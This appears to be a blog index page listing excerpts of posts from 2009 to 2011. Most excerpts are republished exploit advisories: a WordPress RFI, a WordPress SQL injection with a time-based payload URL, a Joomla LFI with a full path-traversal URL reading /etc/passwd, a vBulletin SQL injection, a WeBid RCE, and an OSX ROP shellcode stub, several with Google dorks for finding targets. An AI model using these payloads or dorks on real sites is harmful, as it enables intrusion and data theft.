Android 4 source code will be released before the end of the year

24/10/2011

Well, we have noticed that many readers are already searching Google for the term "installing android 4 on the milestone 2" or something similar (changing only the smartphone). It is not right to chase these installations now, though, because the Google Android 4 source has not even been released to developers yet. As reported (by Notícias Linux and …

OSX universal ROP shellcode, tested on Snow Leopard

03/10/2011

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want …

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …

WordPress Event Registration plugin

06/09/2011

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * …

Joomla Component mod_spo SQL Injection Vulnerability

25/07/2011

# Exploit Title: Simple Page Option LFI # Google Dork: inurl:mod_spo # Date: 15/07/2011 # Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca # Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip # Version: 1.5.x # Tested on: Backtrack and Windows 7 Simple Page Option – LFI Vulnerable-Code: $s_lang =& JRequest::getVar(‘spo_site_lang’); (file_exists(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’)) ? include(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’) : include(dirname(__FILE__).DS.’languages’.DS.’english.php’); Vulnerable-Var: spo_site_lang= Expl0iting: http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using %20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se Reparing?: Just …

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

25/07/2011

# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day # Google Dork: intitle: powered by Vbulletin 4 # Date: 20/07/2011 # Author: FB1H2S # Software Link: [[url]http://www.vbulletin.com/][/url] # Version: [4.x.x] # Tested on: [relevant os] # CVE : [[url]http://members.vbulletin.com/][/url] ###################################################################################################### Vulnerability: ###################################################################################################### Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability …

WeBid

04/07/2011

/* ———————————————————— WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit ———————————————————— author…: EgiX mail…..: n0b0d13s[at]gmail[dot]com link…..: http://www.webidsupport.com/ This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] Vulnerable code to SQL injection in feedback.php: 154. $query = “SELECT title FROM ” . $DBPrefix …

NOVEMBER AND DECEMBER DISCOUNT PROMO CODES FOR ONLINE STORES

17/11/2009

Folks, to check it out just click here. The link above shows discount coupons for online stores such as Submarino, Saraiva, Americanas, etc. Happy shopping!

PHP: No money to "encrypt" your scripts? Obfuscator now!

15/09/2009

Indeed, this tip goes to anyone who needs to save some cash but would like to make their scripts harder to read for the web's two-bit "rippers"! That's right, with PHP Obfuscator your problems are over! Free and open source! Here is the link to the site: http://www.raizlabs.com/software/phpobfuscator/